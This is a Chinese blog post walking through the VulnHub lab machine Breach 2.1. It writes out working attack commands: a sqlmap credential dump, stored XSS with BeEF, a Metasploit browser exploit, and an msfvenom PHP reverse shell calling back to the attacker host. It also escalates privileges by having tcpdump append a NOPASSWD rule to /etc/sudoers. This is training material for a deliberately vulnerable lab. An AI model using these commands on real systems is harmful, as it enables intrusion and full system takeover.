Breach 2.1 靶机

最新推荐文章于 2024-08-02 00:59:46 发布
最新推荐文章于 2024-08-02 00:59:46 发布
阅读量227 收藏 1
点赞数 2
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hqy250019/article/details/140858452
版权

使用kail扫描ip

扫描端口

连接SSH 使80端口开放

账号 peter
密码 inthesource

再次端口扫描

访问ip

进行目录扫描 发现blog

dirb http://192.168.110.151

还想一个搜索框 测试sql注入

1' or1=1#

发现页面报错

使用sqlmap爆破

python sqlmap.py -u "192.168.110.151/blog/index.php?search=" -D oscommerce -T osc_administrators --dump

使用MD5解密 MD5免费在线解密破解_MD5在线加密-SOMD5

得到账号密码 admin/admin

使用密码尝试登录ssh 发现不行

发现这个网站没有对用户输入进行任何过滤,搜索框存在反射型XSS、注册页面存在存储型XSS。

由于注册时没有对输入的用户名进行防护,导致将构造的XSS语句存入了数据库,查看个人信息将会触发用户名的XSS语

点击Menbers 触发xss

在kail开启beef-xss

用msf搜索利用payload

msfconsole
search firefox
use exploit/multi/browser/firefox_proto_crmfrequest

设置参数

set SRVHOST 192.168.110.128
set URIPATH msf
set LHOST 192.168.110.128
set LPORT 8989
run

msf会生成一个URL,用beef的Redirect Browser模块,访问这个地址

将其发送到meterpaper返回shell

use post/multi/manage/shell_to_meterpreter
set session 1
run
sessions 2
shell

python -c 'import pty; pty.spawn("/bin/bash")' 交互式shell

ls -al
echo 'exec sh' > .bashrc

这样就可以使用Peter用户进行ssh连接了

提权

除了peter还有两个用户milton和blumbergh

有个陌生的2323端口正处于监听状态

netstat -tunlpa

telnet 127.0.0.1 2323,连接一下此端口,有个坐标,搜索发现这个坐标刚好是休斯顿(houston)的坐标

用这个houston当密码连接一下

telnet 127.0.0.1 2323
用户名:milton
密码:Houston

登录成功但有几句提示被弹了出来,提示Whose stapler is it?这句话不可能凭空重新,肯定是某个程序执行产生的。

使用 grep | cat /usr/local/bin/cd.py全局搜索看看是哪个文件打印出来的

分析源码,问题答案是mine,如果在三秒内没有回答正确,就会杀死进程,那么再尝试登录并在3秒内输入mine,成功登录

telnet 127.0.0.1 2323
用户名:milton
密码:Houston
口令:mine

netstat -tunlpa,找出来一个陌生的8888端口处于监听状态

用telnet再搞一下,提示输入^]字符逃出

telnet 127.0.0.1 8888

看着像是http服务,用nmap再扫下端口,又多了个服务,8888端口有个http服务

nmap -A -p- 192.168.110.151

目录扫描完,有个oscommerce目录,拼接admin,之前扫出来的admin,admin登录

上传文件处

includes目录下有个可写目录work

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.110.128 LPORT=6869 -f raw -o shell.php 在kali上生成木马

在work目录下新建文件shell.php,将木马源码粘贴进去保存

Kali使用msf的exploit模块开启监听

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.110.128
set LPORT 6869
options
run

浏览器访问木马文件,成功反弹blumbergh用户权限

http://192.168.110.151:8888/oscommerce/includes/work/shell.php

反弹到了

python -c 'import pty; pty.spawn("/bin/bash")'

sudo -l 查看可提权的命令或程序

echo 'echo "blumbergh ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /tmp/shell.sh 
chmod +x /tmp/shell.sh
sudo /usr/sbin/tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/shell.sh -Z root && sudo -i

成功提权

陽陽yy
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
(VulnHub靶机通关)breach系列:breach-2.1细节通关方法
yang1234567898的博客
01-26 3591
靶机下载地址:https://download.vulnhub.com/breach/Breach-2_final2.1.zip 需要配置仅主机模式
breach靶机
Encild的博客
11-09 391
[2021 11 7] breach靶机端口扫描GetShell 目录 breach靶机 端口扫描 GetShell breach靶机 端口扫描 已知IP为192.168.110.140 直接扫描端口: sudo nmap -sF -p1-65535 192.168.110.140 访问80端口: 翻译: Initech 遭到破坏,董事会投票决定引入其内部的 Initech Cyber•• Consulting LLP 部门...
Breach 2.1靶机
最新发布
m0_61995767的博客
08-02 703
Breach 2.1打靶记录
VulnHub靶场笔记 - Breach: 2.1(OSCP推荐靶场)
m0_62652276的博客
12-31 1204
根据此前的提示,我们尝试使用beef-xss工具(密码igfix),我们将红框中的数据作为用户名在blog中注册一个用户,把127.0.0.1替换为Kali的地址。sshd_config是客户端的ssh配置文件,查看内容,在配置文件末尾发现,ssh连接过程会强制执行名为startme的程序,推测其与ssh无法成功连接有关。综合之前的思路,既然peter用户的密码是知道的但无法正常进行ssh登录,我们尝试查找与ssh相关的配置。
Breach-2_final2.1靶机
weixin_74232792的博客
08-01 414
又臭又长
Breach-2.1
weixin_44770698的博客
03-10 727
靶场练习-60
靶机渗透练习34-Beelzebub
hirak0的博客
04-18 544
靶机描述 靶机地址:https://www.vulnhub.com/entry/beelzebub-1,742/ Description Difficulty: Easy You have to enumerate as much as you can and don’t forget about the Base64. For hints add me on Twitter- ShauryaSharma05 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: IP地址:
kali渗透综合靶机(十五)--Breach-1.0靶机
WY92139010的博客
06-09 1431
kali渗透综合靶机(十五)--Breach-1.0靶机 靶机下载地址:https://download.vulnhub.com/breach/Breach-1.0.zip 一、主机发现 1.netdiscover -i eth0 -r 192.168.110.0/24    二、端口扫描 1. masscan --rate=10000 -p0-65535 192.168....
Vulnhub靶场Breach1.0详解
m0_65712192的博客
02-14 1265
Vulnhub靶场Breach1.0详解
一起打靶-Breach-2-final2.1.xss上线
09-28
"一起打靶-Breach-2-final2.1.xss上线" 知识点1:靶机配置 靶机 Breach 2.0 配置了静态 IP(192.168.110.151),用户需要配置主机 only 适配器来访问该子网。 知识点2:生产环境模拟 该挑战试图展示一个真实世界的...
Into the Breach
12-28
《Into the Breach》是一款由 Subset Games 开发并发行的策略类视频游戏,以其独特的回合制战斗机制和深度的战略元素而备受好评。游戏设定在未来的科幻世界,玩家扮演的是一支时间旅行的机甲部队,任务是保护地球免...
email-breach
04-01
电子邮件违规 包含我在进行渗透测试时个人丢弃的所有电子邮件 我已删除所有在转储中多次出现的重复电子邮件 随时欢迎您添加更多电子邮件并扩展列表。 在将重复项添加到此列表之前,请确保将其删除。...
Time Breach-开源
04-26
时间突破是一款大型多人在线角色扮演游戏。 在这个世界里,所有玩家都可以创造自己的世界。 每个世界都必须像经济游戏一样进行管理。 实际上,两种类型的游戏在一个大学上是链接在一起的。
breach:执行BREACH攻击的工具
04-28
该项目在得到了发展,因此,如果您对BREACH攻击的研究感兴趣,请确保进行检查。描述执行攻击的工具。 脚本描述违反开始攻击的主要脚本。 connect.py 嗅探TLS数据包,对TLS记录进行碎片整理并转储标头和有效负载的...
《计算机网络》(学习笔记)
qiqi_liuliu的博客
07-24 2409
网络(Network)由若干结点(Node)和连接这些结点的链路(Link)组成多个网络还可以通过路由器互连起来,这样就构成了一个覆盖范围更大的网络,即互联网(互连网)。因此,互联网是"网络的网络(Network of Networks)"因特网(Internet)是世界上最大的互连网络(用TCP/IP)internet是通用名词,互连的网络都叫internet注:互连、自治、集合。在计算机内部或在相邻设备之间近距离传输时,可不经过调制就在信道上直接进行的传输方式称为基带传输。
Java面试整理,涵盖基础、JVM、线程并发、框架、MySQL、微服务、Redis、中间件、数据结构与算法等。陆续完善中.zip
07-31
Java面试整理,涵盖基础、JVM、线程并发、框架、MySQL、微服务、Redis、中间件、数据结构与算法等。陆续完善中
chromedriver-mac-x64_121.0.6167.184.zip
07-31
chromedriver-mac-x64_121.0.6167.184.zip
【Java面试+Java技术文章汇总】 涵盖大部分Java程序员所需要掌握的核心知识。.zip
07-31
【Java面试+Java技术文章汇总】 涵盖大部分Java程序员所需要掌握的核心知识。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值